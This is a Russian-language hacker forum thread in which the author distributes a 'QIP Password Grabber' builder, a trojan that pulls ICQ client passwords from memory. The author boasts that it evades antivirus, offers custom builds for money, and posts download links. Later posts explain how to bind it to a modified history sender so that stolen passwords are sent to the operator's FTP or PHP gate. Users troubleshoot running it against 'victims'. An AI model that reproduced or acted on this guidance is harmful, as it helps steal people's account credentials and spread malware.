![]() |
QIP Password Grabber
QIP Password Grabber Builder By ICQ Hools
http://icqhools.in/images/qis.jpg таки решился выложить... для всех несекрет что qip хранит пароль в памяти в открытом виде когда вы онлайн У программы есть свои преимущества: + размер запакованного файла всего 33кб + результат приходит моментально после запуска + вытаскивает пароль таже если жертва не сохраняет его + работает на любой версии qip втч последней 8050 + на данный момент не палится антивирусами - _http://www.virustotal.com/ru/analisis/e039ecd49a0219e376e4da6eb7cd50c6 файл сам не пакуется, пакуйте чем хотите =)) И минусы: - Удобно работать можно только в случае если у вас внешний(реальный) ip адрес - У вас должна быть открыта папка на запись - при запуске 1 раз маргнёт черное окошко ) впринципе минусы можно исключить если есть дед... Скачать Скачать QPG.rar с WebFile.RU отпишитесь по делу и поставьте + кому не жалко ;) |
чОта я очкую качать :)
|
Цитата:
|
CrazyStudentS_Mi}{, очкуешь? пиши сам... основной код можешь найти в сети
|
Цитата:
Цитата:
|
перезалейте плиз...ссылка не фурычит
|
Ch1//0ut,обновил первый пост, залил на webfile, но первая ссылка пашет...
|
буду испытателем )
|
Подобный софт давно есть в сети.Так что велосипеда ты не придумал.
|
Не запускаеццо(((
"Приложение не было запущено, поскольку оно некорректно настроено. Повторная установка приложения может решить данную проблему." (((((( |
Цитата:
|
спасибо за плюсы ;)
n0153r, я нигде не писал что я придумал что-то новое сверхъестественное, просто в паблике готового для работы приложения не было. Может быть разработчики квип всё-таки задумаются и больше не будут хранить пароль в памяти, это будет неудобно но надежно. beerhack, билд не запускается или билдер? Еcли что то вот билд - http://icqhools.in/qpg(exe).rar ищите строчку //127.0.0.1/folder/1.txt Shawnix+++, Цитата:
|
сам билдер не запускается
|
Чёт я туплю А как им пользоваться???
|
Chrek625,
отправка отчетов происходит на компьютер который виден из внешней сети т.е протокол ftp не подреживается! Более того должна быть открыта папка для записи. Отчет приходит успешным только в том случае если на момент запуска был включен qip. Когда билдер запускаешь... над строкой ввода написан яркий пример. если не понятно постучи лучше в аську. |
у меня пишет такую ошибку
http://images.i-files.org/uploads/d2d37387861692499ce70c84619b3106/err.jpg скрин |
Не питасаите :)
парень хороший,хотя мне тоже стремно:) |
я пробовал на другом компьютере где стоит виста, там всё работает и билд и билдер
------------------------------------------------------------------- у кого вылезает http://images.i-files.org/uploads/d2d37387861692499ce70c84619b3106/err.jpg вот такая ошибка - значит неправильно указываете путь, для проверки укажите c:/file.txt отпишитесь кому помогло ;) проблему с запуском билдера буду решать... |
ашипка...
у меня xp sp2 |
GroW, ошибка чего? ошибка какая?
если не читал тему то прочти пост №18 - должно помочь |
Спс софт очень помог
|
херня... Вроде всё сделал правильно, лог пришел, а в нём текст вида "О( О(" и эт че хня?
|
посмотрел я эту поделку, улыбнул хвост файла)))
вот люди курсовики делают, ага! D:\МАИ\4 семестр\Выч.мат. мой курсач\qpr\Debug\qpr.pdb по поводу размера - много лишнего, переделать по человечески чтоль |
Цитата:
neprovad, я сам ток потмо заметил )) это стёб, к вычмату никакого отношения не имеею, просто забыл семнить дирректорию )) Цитата:
кому нужна отправка на фтп стучите в аську сделаю билд за 2$, лучше мне чем провайдеру каждый месяц ))) вес упакованного файла стал 81.5 можно еще уменьшить чуть-чуть, просто мне впадлу :) возможно добавление некоторых функций типа: RAS, &RQ, The BAT ))) на данный момент палится: Результат: 6/32 (18.75%) DrWeb 4.44.0.09170 2008.04.19 Trojan.PWS.LDPinch.1941 eSafe 7.0.15.0 2008.04.17 suspicious Trojan/Worm F-Secure 6.70.13260.0 2008.04.19 Suspicious:W32/Malware!Gemini Ikarus T3.1.1.26 2008.04.19 Packer.Malware.FriCryptor.B NOD32v2 3040 2008.04.19 unpack error Sophos 4.28.0 2008.04.19 Sus/UnkPacker |
качать не буду,доверия нету.
|
m9chik, тебя никто не заставляет, исходники основного кода лежат в сети
|
Делаем отправку отчетов на фтп (для чайников)
Из-за неособой актуальности сего чуда расскажу как сделать для себя отправку на фтп: 1) делаем билд QPG, путь укажем например C:/file.xxx 2) берем исходник известного qip history sender'a, в нём заменяем "_srvlog.txt" на "boot.ini", а ".txt" меняем на наше ".xxx", вместо "C:\Program Files\QIP\" пишем "C:\", не забудем вписать ваш хост и путь до гейта, компилим. Эта программа будет слать отчет на фтп через гейт. 3) клеем 2 файла: сначала выбираем QPG Билд, потом берем переделанный нами history sender под отправку наших отчетов. Клеем. 4) размер получается очень большой => жмём и пользуемся что получается? Сначала создаётся наш отчет с нераспространённым расширением на диске "С" для удобного его поиска, далее он отправляется к нам на фтп, но не удаляется у жертвы. здесь написан лишь только самый простой пример как незная программирования осуществить отправку на фтп. Извиняюсь если кого насмешил, но я сам смеялся =)) Всем удачки, отпишитесь у кого работает и не работает если нетрудно, желаю удачи ;) |
Это не из памяти, а из дочернего окна главного окна аси.
В любом случае квип можно выкинуть в помойку |
Цитата:
есть много прог для мониторинга изменений при запуске приложений (по умному не получаеться сказать :D ) |
Цитата:
|
во во
|
Nickotin, очень содержательный пост...
давайте не будем флудь пишите по делу: работает, не работает, предложения и пожелания или кто чем может помочь, может кто хочет присоединиться... |
норм прога, пашет
|
QPG Builder (ftp version)
Для чаников,ленивых, тем кому не помог FAQ а также для удобства: На скорую руку был сделан билдер. +размер билда уменьшен до 77кб +добавлена новая функция &RQ - палится антивирусами Cкачать |
ICQ Hool у мню QPG Builder (ftp version) не хотит запускаться на компе
|
Black dead, лови тогда билд, ищи 1___ и 2____
1___ это "твой сайт.ру" 2___ это путь до гейта например /gate/gate.php Скачать file.exe с WebFile.RU |
хм... не пойму, почему на хосте создается папка с Ipшником, а в нее ничего не приходит???
|
Цитата:
Цитата:
|
Цитата:
|
ой заметил касяк что в отчете приходит второй строчкой надпись "пароль от" =)
а должно быть "пароль от &rq не найден" )) просто "&" вывод обрезала чтоли... это касяк пустяковый но глаза всеравно режет на днях додумаю чтобы с вистой касяка не было |
| Время: 23:40 |